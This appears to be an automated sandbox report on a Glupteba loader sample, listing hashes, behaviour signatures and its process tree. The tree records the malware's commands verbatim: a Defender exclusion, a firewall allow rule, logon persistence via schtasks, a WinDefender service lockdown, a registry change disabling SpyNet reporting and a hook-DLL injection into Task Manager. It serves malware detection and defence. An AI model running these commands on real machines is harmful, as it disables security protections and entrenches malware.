Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-02-2024 03:55

General

  • Target

    bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe

  • Size

    1.4MB

  • MD5

    eba840631908d1b6510df1ad7e64d5ce

  • SHA1

    47f8ba9971bd484a48e4960f0fc7bd9f3643232a

  • SHA256

    bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248

  • SHA512

    a4e711746b78a233ebf91fa7735695f1b17acf4b4296248aea0b39c78a51837d0c3617b0fbf89a6a9466c10fed4412fa34109b6957bcfca3d64cc5a4374555a2

  • SSDEEP

    24576:k0aJxn2Juo1nylyUK3TkosLHCzKyewLms4xuyEuUV21ACcmFkzeyl6KtkGuTWn6f:VWxn2Ju8EK3TkosLGZewLmsYErU6Z/la

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 23 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 11 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 40 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
    "C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4252
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4644
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe
        "C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 388
          4⤵
          • Program crash
          PID:2116
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 372
          4⤵
          • Program crash
          PID:2100
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 404
          4⤵
          • Program crash
          PID:1136
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 624
          4⤵
          • Program crash
          PID:3344
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 600
          4⤵
          • Program crash
          PID:1428
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 716
          4⤵
          • Program crash
          PID:4632
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 680
          4⤵
          • Program crash
          PID:4836
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 760
          4⤵
          • Program crash
          PID:2564
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 768
          4⤵
          • Program crash
          PID:192
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 768
          4⤵
          • Program crash
          PID:1300
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 836
          4⤵
          • Program crash
          PID:2060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 800
          4⤵
          • Program crash
          PID:3344
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 708
          4⤵
          • Program crash
          PID:2108
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 740
          4⤵
          • Program crash
          PID:1568
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 732
          4⤵
          • Program crash
          PID:3008
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 844
          4⤵
          • Program crash
          PID:1004
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 584
          4⤵
          • Program crash
          PID:3224
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 740
          4⤵
          • Program crash
          PID:4104
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 768
          4⤵
          • Program crash
          PID:2780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:660
        • C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe
          "C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:3492
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 356
            5⤵
            • Program crash
            PID:4972
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 344
            5⤵
            • Program crash
            PID:4876
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 568
            5⤵
            • Program crash
            PID:60
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 632
            5⤵
            • Program crash
            PID:2692
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 668
            5⤵
            • Program crash
            PID:208
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 680
            5⤵
            • Program crash
            PID:4132
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 608
            5⤵
            • Program crash
            PID:32
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2936
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 784
            5⤵
            • Program crash
            PID:4768
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 372
            5⤵
            • Program crash
            PID:1396
          • C:\Windows\System32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:2108
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:32
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
                PID:2680
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3896
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Manipulates WinMonFS driver.
                • Drops file in Windows directory
                • Suspicious use of AdjustPrivilegeToken
                PID:4916
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 388
                  6⤵
                  • Program crash
                  PID:800
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 368
                  6⤵
                  • Program crash
                  PID:3352
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 404
                  6⤵
                  • Program crash
                  PID:3116
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 620
                  6⤵
                  • Program crash
                  PID:5000
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 664
                  6⤵
                  • Program crash
                  PID:4744
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 748
                  6⤵
                  • Program crash
                  PID:644
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 708
                  6⤵
                    PID:3364
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 760
                    6⤵
                      PID:2736
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 844
                      6⤵
                        PID:2324
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:2660
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          6⤵
                          • Creates scheduled task(s)
                          PID:2640
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          6⤵
                            PID:2772
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 856
                            6⤵
                              PID:2644
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 912
                              6⤵
                                PID:3132
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 832
                                6⤵
                                  PID:192
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2136
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 832
                                  6⤵
                                    PID:1396
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 776
                                    6⤵
                                      PID:2608
                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3908
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 956
                                      6⤵
                                        PID:2696
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:3352
                                      • C:\Windows\windefender.exe
                                        "C:\Windows\windefender.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3168
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                          7⤵
                                            PID:2900
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                              8⤵
                                              • Launches sc.exe
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2484
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1032
                                          6⤵
                                            PID:1820
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1072
                                            6⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2680
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1128
                                            6⤵
                                              PID:2312
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1168
                                              6⤵
                                                PID:716
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1076
                                                6⤵
                                                  PID:1312
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1200
                                                  6⤵
                                                    PID:1568
                                            • C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe
                                              "C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:2080
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 388
                                                4⤵
                                                • Program crash
                                                PID:2120
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 428
                                                4⤵
                                                • Program crash
                                                PID:660
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 388
                                                4⤵
                                                • Program crash
                                                PID:4384
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 624
                                                4⤵
                                                • Program crash
                                                PID:4736
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 708
                                                4⤵
                                                • Program crash
                                                PID:2248
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 612
                                                4⤵
                                                • Program crash
                                                PID:4916
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 684
                                                4⤵
                                                • Program crash
                                                PID:2116
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 656
                                                4⤵
                                                • Program crash
                                                PID:5112
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 788
                                                4⤵
                                                • Program crash
                                                PID:4792
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 792
                                                4⤵
                                                • Program crash
                                                PID:2608
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 788
                                                4⤵
                                                • Program crash
                                                PID:672
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 820
                                                4⤵
                                                • Program crash
                                                PID:4736
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 772
                                                4⤵
                                                • Program crash
                                                PID:2636
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                  5⤵
                                                    PID:4872
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 780
                                                  4⤵
                                                  • Program crash
                                                  PID:2548
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 796
                                                  4⤵
                                                  • Program crash
                                                  PID:2136
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 800
                                                  4⤵
                                                  • Program crash
                                                  PID:4616
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 772
                                                  4⤵
                                                  • Program crash
                                                  PID:1296
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 784
                                                  4⤵
                                                  • Program crash
                                                  PID:3168
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 592
                                                  4⤵
                                                  • Program crash
                                                  PID:2236
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:664
                                                • C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe
                                                  "C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"
                                                  4⤵
                                                  • Windows security bypass
                                                  • Executes dropped EXE
                                                  • Windows security modification
                                                  • Adds Run key to start application
                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                  • Drops file in Windows directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4484
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 356
                                                    5⤵
                                                    • Program crash
                                                    PID:3660
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 336
                                                    5⤵
                                                    • Program crash
                                                    PID:2780
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 372
                                                    5⤵
                                                    • Program crash
                                                    PID:4656
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 632
                                                    5⤵
                                                    • Program crash
                                                    PID:3688
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 668
                                                    5⤵
                                                    • Program crash
                                                    PID:5100
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 700
                                                    5⤵
                                                    • Program crash
                                                    PID:2312
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 836
                                                    5⤵
                                                    • Program crash
                                                    PID:1940
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 556
                                                    5⤵
                                                    • Program crash
                                                    PID:504
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    5⤵
                                                      PID:4996
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 588
                                                      5⤵
                                                      • Program crash
                                                      PID:428
                                                    • C:\Windows\System32\cmd.exe
                                                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                      5⤵
                                                        PID:4788
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        5⤵
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4612
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        5⤵
                                                          PID:3928
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 968
                                                          5⤵
                                                          • Program crash
                                                          PID:2484
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 648
                                                          5⤵
                                                          • Program crash
                                                          PID:2536
                                                    • C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe
                                                      "C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --silent --allusers=0
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Enumerates connected drives
                                                      • Modifies system certificate store
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3788
                                                      • C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe
                                                        C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6e609558,0x6e609564,0x6e609570
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:2260
                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iNiYbTHs1Lq4Du24QcHKlJFg.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --version
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:316
                                                      • C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe
                                                        "C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3788 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204035522" --session-guid=607bffc0-3e6f-4278-8009-373c08a07445 --server-tracking-blob=YmM1N2E0MmQxYjJjYzYwMDc4ODg0M2QxZDFjNGU4YzljN2JlZDRjMGE5NmFkMDhiODI0ZTQzZDFmNDhiYjA5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzAxODkxOS4xOTU2IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyZTg1NGVhNi03N2U2LTQ3OGQtYTNlNS0yMTQ2ZGU4ZDgyMDIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3980
                                                        • C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe
